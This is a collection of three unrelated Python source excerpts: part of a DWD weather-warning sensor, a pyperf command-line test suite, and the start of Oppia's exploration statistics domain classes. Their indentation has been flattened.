dt_util.utc_from_timestamp(event["end"] / 1000)
)
return data
@property
def available(self):
"""Could the device be accessed during the last update call."""
return self._api.available
def update(self):
"""Get the latest data from the DWD-Weather-Warnings API."""
self._api.update()
class DwdWeatherWarningsAPI:
"""Get the latest data and update the states."""
def __init__(self, region_name):
"""Initialize the data object."""
resource = "{}{}{}?{}".format(
"https://",
"www.dwd.de",
"/DWD/warnungen/warnapp_landkreise/json/warnings.json",
"jsonp=loadWarnings",
)
self._rest = RestData("GET", resource, None, None, None, True)
self.region_name = region_name
self.region_id = None
self.region_state = None
self.data = None
self.available = True
self.update()
@Throttle(SCAN_INTERVAL)
def update(self):
"""Get the latest data from the DWD-Weather-Warnings."""
try:
self._rest.update()
json_string = self._rest.data[24 : len(self._rest.data) - 2]
json_obj = json.loads(json_string)
data = {"time": json_obj["time"]}
for mykey, myvalue in {
"current": "warnings",
"advance": "vorabInformation",
}.items():
_LOGGER.debug(
"Found %d %s global DWD warnings", len(json_obj[myvalue]), mykey
)
data[f"{mykey}_warning_level"] = 0
my_warnings = []
if self.region_id is not None:
# get a specific region_id
if self.region_id in json_obj[myvalue]:
my_warnings = json_obj[myvalue][self.region_id]
else:
# loop through all items to find warnings, region_id
# and region_state for region_name
for key in json_obj[myvalue]:
my_region = json_obj[myvalue][key][0]["regionName"]
if my_region != self.region_name:
continue
my_warnings = json_obj[myvalue][key]
my_state = json_obj[myvalue][key][0]["stateShort"]
self.region_id = key
self.region_state = my_state
break
# Get max warning level
maxlevel = data[f"{mykey}_warning_level"]
for event in my_warnings:
if event["level"] >= maxlevel:
data[f"{mykey}_warning_level"] = event["level"]
data[f"{mykey}_warning_count"] = len(my_warnings)
data[f"{mykey}_warnings"] = my_warnings
_LOGGER.debug("Found %d %s local DWD warnings", len(my_warnings), mykey)
self.data = data
self.available = True
except TypeError:
_LOGGER.error("Unable to fetch data from DWD-Weather-Warnings")
self.available = False
|
|
import os
import sys
import textwrap
import unittest
import pyperf
from pyperf import tests
TESTDIR = os.path.dirname(__file__)
TELCO = os.path.join(TESTDIR, 'telco.json')
class BaseTestCase(object):
maxDiff = 100 * 80
def create_bench(self, values, metadata=None):
if metadata is None:
metadata = {'name': 'bench'}
elif 'name' not in metadata:
metadata['name'] = 'bench'
runs = []
for value in values:
run = pyperf.Run([value],
metadata=metadata,
collect_metadata=False)
runs.append(run)
return pyperf.Benchmark(runs)
def run_command(self, *args, **kwargs):
cmd = [sys.executable, '-m', 'pyperf']
cmd.extend(args)
proc = tests.get_output(cmd, **kwargs)
self.assertEqual(proc.stderr, '')
self.assertEqual(proc.returncode, 0)
return proc.stdout
class TestPerfCLI(BaseTestCase, unittest.TestCase):
def create_suite(self):
bench1 = self.create_bench((1.0, 1.5, 2.0),
metadata={'hostname': 'toto',
'python_version': '2.7',
'name': 'py36'})
bench2 = self.create_bench((1.5, 2.0, 2.5),
metadata={'hostname': 'toto',
'python_version': '3.4',
'name': 'py38'})
return pyperf.BenchmarkSuite([bench1, bench2])
def test_show_common_metadata(self):
suite = self.create_suite()
with tests.temporary_file() as tmp_name:
suite.dump(tmp_name)
stdout = self.run_command('show', '-q', '--metadata', tmp_name)
expected = textwrap.dedent("""
Common metadata
===============
- hostname: toto
py36
----
Metadata:
- python_version: 2.7
Mean +- std dev: 1.50 sec +- 0.50 sec
py38
----
Metadata:
- python_version: 3.4
Mean +- std dev: 2.00 sec +- 0.50 sec
""").strip()
self.assertEqual(stdout.rstrip(), expected)
def test_metadata(self):
suite = self.create_suite()
with tests.temporary_file() as tmp_name:
suite.dump(tmp_name)
stdout = self.run_command('metadata', '-q', tmp_name)
expected = textwrap.dedent("""
Common metadata
===============
- hostname: toto
py36
----
Metadata:
- python_version: 2.7
py38
----
Metadata:
- python_version: 3.4
""").strip()
self.assertEqual(stdout.rstrip(), expected)
def compare(self, action, ref_result, changed_result, *args):
with tests.temporary_directory() as tmpdir:
ref_name = os.path.join(tmpdir, 'ref.json')
changed_name = os.path.join(tmpdir, 'changed.json')
ref_result.dump(ref_name)
changed_result.dump(changed_name)
stdout = self.run_command(action, ref_name, changed_name, *args)
return stdout
def test_compare_to(self):
ref_result = self.create_bench((1.0, 1.5, 2.0),
metadata={'name': 'telco'})
changed_result = self.create_bench((1.5, 2.0, 2.5),
metadata={'name': 'telco'})
stdout = self.compare('compare_to', ref_result, changed_result, '-v')
expected = ('Mean +- std dev: [ref] 1.50 sec +- 0.50 sec '
'-> [changed] 2.00 sec +- 0.50 sec: 1.33x slower\n'
'Not significant!')
self.assertEqual(stdout.rstrip(),
expected)
def test_compare_to_table(self):
ref_result = self.create_bench((1.0,),
metadata={'name': 'telco'})
changed_result = self.create_bench((2.0,),
metadata={'name': 'telco'})
stdout = self.compare('compare_to', ref_result, changed_result, '--table')
expected = textwrap.dedent('''
+-----------+----------+------------------------+
| Benchmark | ref | changed |
+===========+==========+========================+
| telco | 1.00 sec | 2.00 sec: 2.00x slower |
+-----------+----------+------------------------+
''').strip()
self.assertEqual(stdout.rstrip(),
expected)
def test_compare_to_table_not_significant(self):
ref_result = self.create_bench((1.0, 1.5, 2.0),
metadata={'name': 'telco'})
changed_result = self.create_bench((1.5, 2.0, 2.5),
metadata={'name': 'telco'})
stdout = self.compare('compare_to', ref_result, changed_result, '--table')
expected = "Benchmark hidden because not significant (1): telco"
self.assertEqual(stdout.rstrip(),
expected)
def test_compare_to_not_significant(self):
ref_result = self.create_bench((1.0, 1.5, 2.0),
metadata={'name': 'name'})
changed_result = self.create_bench((1.5, 2.0, 2.5),
metadata={'name': 'name'})
stdout = self.compare('compare_to', ref_result, changed_result)
expected = 'Benchmark hidden because not significant (1): name'
self.assertEqual(stdout.rstrip(),
expected)
def test_compare_to_not_significant_verbose(self):
ref_result = self.create_bench((1.0, 1.5, 2.0),
metadata={'name': 'name'})
changed_result = self.create_bench((1.5, 2.0, 2.5),
metadata={'name': 'name'})
stdout = self.compare('compare_to', ref_result, changed_result, '-v')
expected = ('Mean +- std dev: [ref] 1.50 sec +- 0.50 sec '
'-> [changed] 2.00 sec +- 0.50 sec: 1.33x slower\n'
'Not significant!')
self.assertEqual(stdout.rstrip(),
expected)
def test_compare_to_same(self):
values = (1.0, 1.5, 2.0)
ref_result = self.create_bench(values, metadata={'name': 'name'})
changed_result = self.create_bench(values, metadata={'name': 'name'})
stdout = self.compare('compare_to', ref_result, changed_result, '-v')
expected = ('Mean +- std dev: [ref] 1.50 sec +- 0.50 sec '
'-> [changed] 1.50 sec +- 0.50 sec: no change\n'
'Not significant!')
self.assertEqual(stdout.rstrip(),
expected)
def check_command(self, expected, *args, **kwargs):
stdout = self.run_command(*args, **kwargs)
self.assertEqual(stdout, textwrap.dedent(expected).lstrip())
def test_compare_to_cli(self):
py36 = os.path.join(TESTDIR, 'mult_list_py36.json')
py37 = os.path.join(TESTDIR, 'mult_list_py37.json')
py38 = os.path.join(TESTDIR, 'mult_list_py38.json')
# 2 files
expected = """
[1]*1000: Mean +- std dev: [mult_list_py36] 2.13 us +- 0.06 us -> [mult_list_py37] 2.09 us +- 0.04 us: 1.02x faster
[1,2]*1000: Mean +- std dev: [mult_list_py36] 3.70 us +- 0.05 us -> [mult_list_py37] 5.28 us +- 0.09 us: 1.42x slower
[1,2,3]*1000: Mean +- std dev: [mult_list_py36] 4.61 us +- 0.13 us -> [mult_list_py37] 6.05 us +- 0.11 us: 1.31x slower
Geometric mean: 1.22x slower
"""
self.check_command(expected, 'compare_to', py36, py37)
# 2 files grouped by speed
expected = """
Slower (2):
- [1,2]*1000: 3.70 us +- 0.05 us -> 5.28 us +- 0.09 us: 1.42x slower
- [1,2,3]*1000: 4.61 us +- 0.13 us -> 6.05 us +- 0.11 us: 1.31x slower
Faster (1):
- [1]*1000: 2.13 us +- 0.06 us -> 2.09 us +- 0.04 us: 1.02x faster
Geometric mean: 1.22x slower
"""
self.check_command(expected, 'compare_to', "--group-by-speed", py36, py37)
# 2 files grouped by speed (with not significant)
expected = """
Faster (2):
- [1,2]*1000: 3.70 us +- 0.05 us -> 3.18 us +- 0.08 us: 1.16x faster
- [1,2,3]*1000: 4.61 us +- 0.13 us -> 4.17 us +- 0.11 us: 1.11x faster
Benchmark hidden because not significant (1): [1]*1000
Geometric mean: 1.09x faster
"""
self.check_command(expected, 'compare_to', "--group-by-speed", py36, py38)
# 3 files
expected = """
[1]*1000
========
Mean +- std dev: [mult_list_py36] 2.13 us +- 0.06 us -> [mult_list_py37] 2.09 us +- 0.04 us: 1.02x faster
Mean +- std dev: [mult_list_py36] 2.13 us +- 0.06 us -> [mult_list_py38] 2.13 us +- 0.03 us: 1.00x slower
Not significant!
[1,2]*1000
==========
Mean +- std dev: [mult_list_py36] 3.70 us +- 0.05 us -> [mult_list_py37] 5.28 us +- 0.09 us: 1.42x slower
Mean +- std dev: [mult_list_py36] 3.70 us +- 0.05 us -> [mult_list_py38] 3.18 us +- 0.08 us: 1.16x faster
[1,2,3]*1000
============
Mean +- std dev: [mult_list_py36] 4.61 us +- 0.13 us -> [mult_list_py37] 6.05 us +- 0.11 us: 1.31x slower
Mean +- std dev: [mult_list_py36] 4.61 us +- 0.13 us -> [mult_list_py38] 4.17 us +- 0.11 us: 1.11x faster
Geometric mean
==============
mult_list_py37: 1.22x slower
mult_list_py38: 1.09x faster
"""
self.check_command(expected, 'compare_to', py36, py37, py38)
# 3 files as table
expected = """
+----------------+----------------+-----------------------+-----------------------+
| Benchmark | mult_list_py36 | mult_list_py37 | mult_list_py38 |
+================+================+=======================+=======================+
| [1]*1000 | 2.13 us | 2.09 us: 1.02x faster | not significant |
+----------------+----------------+-----------------------+-----------------------+
| [1,2]*1000 | 3.70 us | 5.28 us: 1.42x slower | 3.18 us: 1.16x faster |
+----------------+----------------+-----------------------+-----------------------+
| [1,2,3]*1000 | 4.61 us | 6.05 us: 1.31x slower | 4.17 us: 1.11x faster |
+----------------+----------------+-----------------------+-----------------------+
| Geometric mean | (ref) | 1.22x slower | 1.09x faster |
+----------------+----------------+-----------------------+-----------------------+
"""
self.check_command(expected, 'compare_to', '--table', py36, py37, py38)
# 3 files as table grouped by speed
expected = """
+----------------+----------------+-----------------------+
| Benchmark | mult_list_py36 | mult_list_py37 |
+================+================+=======================+
| [1]*1000 | 2.13 us | 2.09 us: 1.02x faster |
+----------------+----------------+-----------------------+
| [1,2,3]*1000 | 4.61 us | 6.05 us: 1.31x slower |
+----------------+----------------+-----------------------+
| [1,2]*1000 | 3.70 us | 5.28 us: 1.42x slower |
+----------------+----------------+-----------------------+
| Geometric mean | (ref) | 1.22x slower |
+----------------+----------------+-----------------------+
"""
self.check_command(expected, 'compare_to', '--table', "--group-by-speed", py36, py37)
def test_compare_to_cli_min_speed(self):
py36 = os.path.join(TESTDIR, 'mult_list_py36.json')
py37 = os.path.join(TESTDIR, 'mult_list_py37.json')
py38 = os.path.join(TESTDIR, 'mult_list_py38.json')
# 2 files, min-speed=10
expected = """
[1,2]*1000: Mean +- std dev: [mult_list_py36] 3.70 us +- 0.05 us -> [mult_list_py37] 5.28 us +- 0.09 us: 1.42x slower
[1,2,3]*1000: Mean +- std dev: [mult_list_py36] 4.61 us +- 0.13 us -> [mult_list_py37] 6.05 us +- 0.11 us: 1.31x slower
Benchmark hidden because not significant (1): [1]*1000
Geometric mean: 1.22x slower
"""
self.check_command(expected, 'compare_to', "--min-speed=10", py36, py37)
# 2 files, min-speed=40
expected = """
[1,2]*1000: Mean +- std dev: [mult_list_py36] 3.70 us +- 0.05 us -> [mult_list_py37] 5.28 us +- 0.09 us: 1.42x slower
Benchmark hidden because not significant (2): [1]*1000, [1,2,3]*1000
Geometric mean: 1.22x slower
"""
self.check_command(expected, 'compare_to', "--min-speed=40", py36, py37)
# 3 files as table, min-speed=10
expected = """
+----------------+----------------+-----------------------+-----------------------+
| Benchmark | mult_list_py36 | mult_list_py37 | mult_list_py38 |
+================+================+=======================+=======================+
| [1,2]*1000 | 3.70 us | 5.28 us: 1.42x slower | 3.18 us: 1.16x faster |
+----------------+----------------+-----------------------+-----------------------+
| [1,2,3]*1000 | 4.61 us | 6.05 us: 1.31x slower | 4.17 us: 1.11x faster |
+----------------+----------------+-----------------------+-----------------------+
| Geometric mean | (ref) | 1.22x slower | 1.09x faster |
+----------------+----------------+-----------------------+-----------------------+
Benchmark hidden because not significant (1): [1]*1000
"""
self.check_command(expected, 'compare_to', '--table', "--min-speed=10", py36, py37, py38)
def test_hist(self):
# Force terminal size on Python 3 for shutil.get_terminal_size()
env = dict(os.environ)
env['COLUMNS'] = '80'
env['LINES'] = '25'
expected = ("""
22.1 ms: 1 #####
22.1 ms: 0 |
22.2 ms: 1 #####
22.2 ms: 2 ##########
22.2 ms: 3 ##############
22.3 ms: 6 #############################
22.3 ms: 4 ###################
22.3 ms: 7 ##################################
22.4 ms: 8 ######################################
22.4 ms: 14 ###################################################################
22.4 ms: 11 #####################################################
22.5 ms: 5 ########################
22.5 ms: 10 ################################################
22.6 ms: 8 ######################################
22.6 ms: 4 ###################
22.6 ms: 7 ##################################
22.7 ms: 3 ##############
22.7 ms: 4 ###################
22.7 ms: 4 ###################
22.8 ms: 7 ##################################
22.8 ms: 3 ##############
22.9 ms: 4 ###################
22.9 ms: 4 ###################
""")
self.check_command(expected, 'hist', TELCO, env=env)
def test_show(self):
expected = ("""
Mean +- std dev: 22.5 ms +- 0.2 ms
""")
self.check_command(expected, 'show', TELCO)
def test_stats(self):
expected = ("""
Total duration: 29.2 sec
Start date: 2016-10-21 03:14:19
End date: 2016-10-21 03:14:53
Raw value minimum: 177 ms
Raw value maximum: 183 ms
Number of calibration run: 1
Number of run with values: 40
Total number of run: 41
Number of warmup per run: 1
Number of value per run: 3
Loop iterations per value: 8
Total number of values: 120
Minimum: 22.1 ms
Median +- MAD: 22.5 ms +- 0.1 ms
Mean +- std dev: 22.5 ms +- 0.2 ms
Maximum: 22.9 ms
0th percentile: 22.1 ms (-2% of the mean) -- minimum
5th percentile: 22.3 ms (-1% of the mean)
25th percentile: 22.4 ms (-1% of the mean) -- Q1
50th percentile: 22.5 ms (-0% of the mean) -- median
75th percentile: 22.7 ms (+1% of the mean) -- Q3
95th percentile: 22.9 ms (+2% of the mean)
100th percentile: 22.9 ms (+2% of the mean) -- maximum
Number of outlier (out of 22.0 ms..23.0 ms): 0
""")
self.check_command(expected, 'stats', TELCO)
def test_dump_raw(self):
expected = """
Run 1: calibrate the number of loops: 8
- raw calibrate 1: 23.1 ms (loops: 1)
- raw calibrate 2: 45.0 ms (loops: 2)
- raw calibrate 3: 89.9 ms (loops: 4)
- raw calibrate 4: 179 ms (loops: 8)
Run 2: 1 warmup, 3 values, 8 loops
- raw warmup 1: 180 ms
- raw value 1: 182 ms
- raw value 2: 180 ms
- raw value 3: 181 ms
"""
stdout = self.run_command('dump', '--raw', TELCO)
self.assertIn(textwrap.dedent(expected).strip(), stdout)
def test_dump(self):
expected = """
Run 1: calibrate the number of loops: 8
- calibrate 1: 23.1 ms (loops: 1, raw: 23.1 ms)
- calibrate 2: 22.5 ms (loops: 2, raw: 45.0 ms)
- calibrate 3: 22.5 ms (loops: 4, raw: 89.9 ms)
- calibrate 4: 22.4 ms (loops: 8, raw: 179 ms)
Run 2: 1 warmup, 3 values, 8 loops
- warmup 1: 22.5 ms
- value 1: 22.8 ms
- value 2: 22.5 ms
- value 3: 22.6 ms
"""
stdout = self.run_command('dump', TELCO)
self.assertIn(textwrap.dedent(expected).strip(), stdout)
def test_dump_track_memory(self):
expected = """
Run 1: calibrate the number of loops: 2^15
- calibrate 1: 7188.0 kB (loops: 2^15)
Run 2: 0 warmups, 1 value, 2^15 loops
- value 1: 7188.0 kB
Run 3: 0 warmups, 1 value, 2^15 loops
- value 1: 7192.0 kB
Run 4: 0 warmups, 1 value, 2^15 loops
- value 1: 7208.0 kB
"""
filename = os.path.join(TESTDIR, 'track_memory.json')
stdout = self.run_command('dump', filename)
self.assertIn(textwrap.dedent(expected).strip(), stdout)
def test_dump_quiet(self):
expected = """
Run 2:
- value 1: 22.8 ms
- value 2: 22.5 ms
- value 3: 22.6 ms
Run 3:
- value 1: 22.3 ms
- value 2: 22.4 ms
- value 3: 22.3 ms
"""
stdout = self.run_command('dump', '--quiet', TELCO)
self.assertIn(textwrap.dedent(expected).strip(), stdout)
def test_dump_verbose(self):
expected = """
Run 1: calibrate the number of loops: 8
- calibrate 1: 23.1 ms (loops: 1, raw: 23.1 ms)
- calibrate 2: 22.5 ms (loops: 2, raw: 45.0 ms)
- calibrate 3: 22.5 ms (loops: 4, raw: 89.9 ms)
- calibrate 4: 22.4 ms (loops: 8, raw: 179 ms)
- Metadata:
cpu_freq: 2=3596 MHz, 3=1352 MHz
cpu_temp: coretemp:Physical id 0=67 C, coretemp:Core 0=51 C, coretemp:Core 1=67 C
date: 2016-10-21 03:14:19.670631
duration: 338 ms
load_avg_1min: 0.29
mem_max_rss: 13.4 MB
runnable_threads: 1
uptime: 2 day 2 hour 4 min
Run 2: 1 warmup, 3 values, 8 loops
- warmup 1: 22.5 ms
- value 1: 22.8 ms
- value 2: 22.5 ms
- value 3: 22.6 ms
- Metadata:
cpu_freq: 2=3596 MHz, 3=2998 MHz
cpu_temp: coretemp:Physical id 0=67 C, coretemp:Core 0=51 C, coretemp:Core 1=67 C
date: 2016-10-21 03:14:20.496710
duration: 723 ms
load_avg_1min: 0.29
mem_max_rss: 13.5 MB
runnable_threads: 1
uptime: 2 day 2 hour 4 min
"""
stdout = self.run_command('dump', '--verbose', TELCO)
self.assertIn(textwrap.dedent(expected).strip(), stdout)
def test_collect_metadata(self):
stdout = self.run_command('collect_metadata')
self.assertRegex(stdout,
r'^Metadata:\n(- [^:]+: .*\n)+$')
def test_slowest(self):
stdout = self.run_command('slowest', TELCO)
self.assertEqual(stdout.rstrip(),
'#1: telco (29.2 sec)')
def test_check_stable(self):
stdout = self.run_command('check', TELCO)
self.assertEqual(stdout.rstrip(),
'The benchmark seems to be stable')
def test_command(self):
command = [sys.executable, '-c', 'pass']
stdout = self.run_command('command', '--debug-single-value', *command)
self.assertRegex(stdout,
r'^\.\ncommand: [0-9.]+ (?:ms|sec)$')
def test_check_unstable(self):
suite = self.create_suite()
with tests.temporary_file() as tmp_name:
suite.dump(tmp_name)
stdout = self.run_command('check', tmp_name)
expected = textwrap.dedent("""
py36
----
WARNING: the benchmark result may be unstable
* the standard deviation (500 ms) is 33% of the mean (1.50 sec)
Try to rerun the benchmark with more runs, values and/or loops.
Run '{0} -m pyperf system tune' command to reduce the system jitter.
Use pyperf stats, pyperf dump and pyperf hist to analyze results.
Use --quiet option to hide these warnings.
py38
----
WARNING: the benchmark result may be unstable
* the standard deviation (500 ms) is 25% of the mean (2.00 sec)
Try to rerun the benchmark with more runs, values and/or loops.
Run '{0} -m pyperf system tune' command to reduce the system jitter.
Use pyperf stats, pyperf dump and pyperf hist to analyze results.
Use --quiet option to hide these warnings.
""").strip()
expected = expected.format(os.path.basename(sys.executable))
self.assertEqual(stdout.rstrip(), expected)
def _check_track_memory_bench(self, bench, loops):
self.assertEqual(bench.get_nrun(), 2)
for run in bench.get_runs():
self.assertEqual(run.warmups, ())
self.assertEqual(len(run.values), 1)
self.assertIsInstance(run.values[0], int)
self.assertEqual(run.get_loops(), loops)
metadata = run.get_metadata()
self.assertEqual(metadata['warmups'], 1)
self.assertEqual(metadata['values'], 3)
def _check_track_memory(self, track_option):
with tests.temporary_file() as tmp_name:
self.run_command('timeit',
track_option,
'-p2', '-w1', '-l5', '-n3',
'[1,2]*1000',
'-o', tmp_name)
bench = pyperf.Benchmark.load(tmp_name)
self._check_track_memory_bench(bench, loops=5)
def test_track_memory(self):
self._check_track_memory('--track-memory')
def test_tracemalloc(self):
try:
import tracemalloc # noqa
except ImportError:
self.skipTest('tracemalloc module not available')
self._check_track_memory('--tracemalloc')
@unittest.skipIf(sys.platform == 'win32',
'https://github.com/psf/pyperf/issues/97')
def test_command_track_memory(self):
cmd = (sys.executable, '-c', 'pass')
with tests.temporary_file() as tmp_name:
args = ('command',
'--track-memory',
'-p2', '-w1', '-l2', '-n3',
'-o', tmp_name,
'--')
args += cmd
self.run_command(*args)
bench = pyperf.Benchmark.load(tmp_name)
self._check_track_memory_bench(bench, loops=2)
class TestConvert(BaseTestCase, unittest.TestCase):
def test_stdout(self):
bench = self.create_bench((1.0, 1.5, 2.0))
with tests.temporary_file() as tmp_name:
bench.dump(tmp_name)
stdout = self.run_command('convert', tmp_name, '--stdout')
self.assertEqual(stdout,
tests.benchmark_as_json(bench))
def test_indent(self):
bench = self.create_bench((1.0, 1.5, 2.0))
with tests.temporary_file() as tmp_name:
bench.dump(tmp_name)
stdout = self.run_command('convert', tmp_name,
'--indent', '--stdout')
self.assertEqual(stdout,
tests.benchmark_as_json(bench, compact=False))
def test_convert(self):
bench = pyperf.Benchmark.load(TELCO)
with tests.temporary_directory() as tmpdir:
filename = os.path.join(tmpdir, 'test.json')
self.run_command('convert', TELCO, '-o', filename)
bench2 = pyperf.Benchmark.load(filename)
tests.compare_benchmarks(self, bench2, bench)
def test_filter_benchmarks(self):
values = (1.0, 1.5, 2.0)
benchmarks = []
for name in ("call_simple", "go", "telco"):
bench = self.create_bench(values, metadata={'name': name})
benchmarks.append(bench)
suite = pyperf.BenchmarkSuite(benchmarks)
with tests.temporary_directory() as tmpdir:
filename = os.path.join(tmpdir, 'test.json')
suite.dump(filename)
stdout = self.run_command('convert', filename,
'--include-benchmark', 'go', '--stdout')
suite2 = pyperf.BenchmarkSuite.loads(stdout)
stdout = self.run_command('convert', filename,
'--exclude-benchmark', 'go', '--stdout')
suite3 = pyperf.BenchmarkSuite.loads(stdout)
self.assertEqual(suite2.get_benchmark_names(),
['go'])
self.assertEqual(suite3.get_benchmark_names(),
['call_simple', 'telco'])
def test_remove_warmups(self):
values = [1.0, 2.0, 3.0]
raw_values = [5.0] + values
run = pyperf.Run(values, warmups=[(1, 5.0)],
metadata={'name': 'bench'})
bench = pyperf.Benchmark([run])
self.assertEqual(bench._get_nwarmup(), 1)
self.assertEqual(bench._get_raw_values(warmups=True),
raw_values)
with tests.temporary_directory() as tmpdir:
filename = os.path.join(tmpdir, 'test.json')
bench.dump(filename)
stdout = self.run_command('convert', filename,
'--remove-warmups', '--stdout')
bench2 = pyperf.Benchmark.loads(stdout)
self.assertEqual(bench2._get_nwarmup(), 0)
self.assertEqual(bench2._get_raw_values(warmups=True),
raw_values[1:])
def test_filter_runs(self):
runs = (1.0, 2.0, 3.0, 4.0, 5.0)
bench = self.create_bench(runs)
self.assertEqual(bench.get_values(), runs)
with tests.temporary_directory() as tmpdir:
filename = os.path.join(tmpdir, 'test.json')
bench.dump(filename)
stdout = self.run_command('convert', filename,
'--include-runs', '4', '--stdout')
bench2 = pyperf.Benchmark.loads(stdout)
stdout = self.run_command('convert', filename,
'--include-runs', '1-3,5', '--stdout')
bench3 = pyperf.Benchmark.loads(stdout)
stdout = self.run_command('convert', filename,
'--exclude-runs', '2,4', '--stdout')
bench4 = pyperf.Benchmark.loads(stdout)
self.assertEqual(bench2.get_values(), (4.0,))
self.assertEqual(bench3.get_values(), (1.0, 2.0, 3.0, 5.0))
self.assertEqual(bench4.get_values(), (1.0, 3.0, 5.0))
if __name__ == "__main__":
unittest.main()
|
|
# coding: utf-8
#
# Copyright 2014 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Domain object for statistics models."""
import numbers
import sys
from core.domain import action_registry
from core.domain import exp_domain
from core.domain import interaction_registry
from core.domain import issue_registry
from core.platform import models
import feconf
import utils
(stats_models,) = models.Registry.import_models([models.NAMES.statistics])
# These are special sentinel values attributed to answers migrated from the old
# answer storage model. Those answers could not have session IDs or time spent
# values inferred or reconstituted perfectly, so they are assigned these
# values, instead. Logic and jobs which use these values are expected to skip
# over the migrated answers to avoid tainted results. Furthermore, all migrated
# answers are easy to retrieve by reducing session value on this session ID.
# NOTE TO DEVELOPERS: All other state answer data model entities must not ever
# store this session ID unless it was created by the 2017 answer migration job
# (see #1205). Also, this string must never change.
MIGRATED_STATE_ANSWER_SESSION_ID_2017 = 'migrated_state_answer_session_id_2017'
MIGRATED_STATE_ANSWER_TIME_SPENT_IN_SEC = 0.0
# These values dictate the types of calculation objects stored in
# StateAnswersCalcOutput.
CALC_OUTPUT_TYPE_ANSWER_FREQUENCY_LIST = 'AnswerFrequencyList'
CALC_OUTPUT_TYPE_CATEGORIZED_ANSWER_FREQUENCY_LISTS = (
'CategorizedAnswerFrequencyLists')
class ExplorationStats(object):
"""Domain object representing analytics data for an exploration."""
def __init__(
self, exp_id, exp_version, num_starts_v1, num_starts_v2,
num_actual_starts_v1, num_actual_starts_v2, num_completions_v1,
num_completions_v2, state_stats_mapping):
"""Constructs an ExplorationStats domain object.
Args:
exp_id: str. ID of the exploration.
exp_version: int. Version of the exploration.
num_starts_v1: int. Number of learners who started the exploration.
num_starts_v2: int. As above, but for events with version 2.
num_actual_starts_v1: int. Number of learners who actually attempted
the exploration. These are the learners who have completed the
initial state of the exploration and traversed to the next
state.
num_actual_starts_v2: int. As above, but for events with version 2.
num_completions_v1: int. Number of learners who completed the
exploration.
num_completions_v2: int. As above, but for events with version 2.
state_stats_mapping: dict. A dictionary mapping the state names of
an exploration to the corresponding StateStats domain object.
"""
self.exp_id = exp_id
self.exp_version = exp_version
self.num_starts_v1 = num_starts_v1
self.num_starts_v2 = num_starts_v2
self.num_actual_starts_v1 = num_actual_starts_v1
self.num_actual_starts_v2 = num_actual_starts_v2
self.num_completions_v1 = num_completions_v1
self.num_completions_v2 = num_completions_v2
self.state_stats_mapping = state_stats_mapping
@property
def num_starts(self):
"""Returns the number of learners who started the exploration.
Returns:
int. The number of learners who started the exploration.
"""
return self.num_starts_v1 + self.num_starts_v2
@property
def num_actual_starts(self):
"""Returns the number of learners who actually attempted the
exploration. These are the learners who have completed the initial
state of the exploration and traversed to the next state.
Returns:
int. The number of learners who actually attempted
the exploration.
"""
return self.num_actual_starts_v1 + self.num_actual_starts_v2
@property
def num_completions(self):
"""Returns the number of learners who completed the exploration.
Returns:
int. The number of learners who completed the exploration.
"""
return self.num_completions_v1 + self.num_completions_v2
def to_dict(self):
"""Returns a dict representation of the domain object."""
state_stats_mapping_dict = {}
for state_name in self.state_stats_mapping:
state_stats_mapping_dict[state_name] = self.state_stats_mapping[
state_name].to_dict()
exploration_stats_dict = {
'exp_id': self.exp_id,
'exp_version': self.exp_version,
'num_starts_v1': self.num_starts_v1,
'num_starts_v2': self.num_starts_v2,
'num_actual_starts_v1': self.num_actual_starts_v1,
'num_actual_starts_v2': self.num_actual_starts_v2,
'num_completions_v1': self.num_completions_v1,
'num_completions_v2': self.num_completions_v2,
'state_stats_mapping': state_stats_mapping_dict
}
return exploration_stats_dict
def to_frontend_dict(self):
"""Returns a dict representation of the domain object for use in the
frontend.
"""
state_stats_mapping_dict = {}
for state_name in self.state_stats_mapping:
state_stats_mapping_dict[state_name] = self.state_stats_mapping[
state_name].to_frontend_dict()
exploration_stats_dict = {
'exp_id': self.exp_id,
'exp_version': self.exp_version,
'num_starts': self.num_starts,
'num_actual_starts': self.num_actual_starts,
'num_completions': self.num_completions,
'state_stats_mapping': state_stats_mapping_dict
}
return exploration_stats_dict
@classmethod
def create_default(cls, exp_id, exp_version, state_stats_mapping):
"""Creates a ExplorationStats domain object and sets all properties to
0.
Args:
exp_id: str. ID of the exploration.
exp_version: int. Version of the exploration.
state_stats_mapping: dict. A dict mapping state names to their
corresponding StateStats.
Returns:
ExplorationStats. The exploration stats domain object.
"""
return cls(exp_id, exp_version, 0, 0, 0, 0, 0, 0, state_stats_mapping)
def get_sum_of_first_hit_counts(self):
"""Compute the sum of first hit counts for the exploration stats.
Returns:
int. Sum of first hit counts.
"""
sum_first_hits = 0
for state_name in self.state_stats_mapping:
state_stats = self.state_stats_mapping[state_name]
sum_first_hits += state_stats.first_hit_count
return sum_first_hits
def validate(self):
"""Validates the ExplorationStats domain object."""
exploration_stats_properties = [
'num_starts_v1',
'num_starts_v2',
'num_actual_starts_v1',
'num_actual_starts_v2',
'num_completions_v1',
'num_completions_v2',
]
if not isinstance(self.exp_id, basestring):
raise utils.ValidationError(
'Expected exp_id to be a string, received %s' % (self.exp_id))
if not isinstance(self.exp_version, int):
raise utils.ValidationError(
'Expected exp_version to be an int, received %s' % (
self.exp_version))
exploration_stats_dict = self.to_dict()
for stat_property in exploration_stats_properties:
if not isinstance(exploration_stats_dict[stat_property], int):
raise utils.ValidationError(
'Expected %s to be an int, received %s' % (
stat_property, exploration_stats_dict[stat_property]))
if exploration_stats_dict[stat_property] < 0:
raise utils.ValidationError(
'%s cannot have negative values' % (stat_property))
if not isinstance(self.state_stats_mapping, dict):
raise utils.ValidationError(
'Expected state_stats_mapping to be a dict, received %s' % (
self.state_stats_mapping))
class StateStats(object):
"""Domain object representing analytics data for an exploration's state.
Instances of these domain objects pertain to the exploration ID and version
as well.
"""
def __init__(
self, total_answers_count_v1, total_answers_count_v2,
useful_feedback_count_v1, useful_feedback_count_v2,
total_hit_count_v1, total_hit_count_v2, first_hit_count_v1,
first_hit_count_v2, num_times_solution_viewed_v2,
num_completions_v1, num_completions_v2):
"""Constructs a StateStats domain object.
Args:
total_answers_count_v1: int. Total number of answers submitted to
this state.
total_answers_count_v2: int. As above, but for events with version
2.
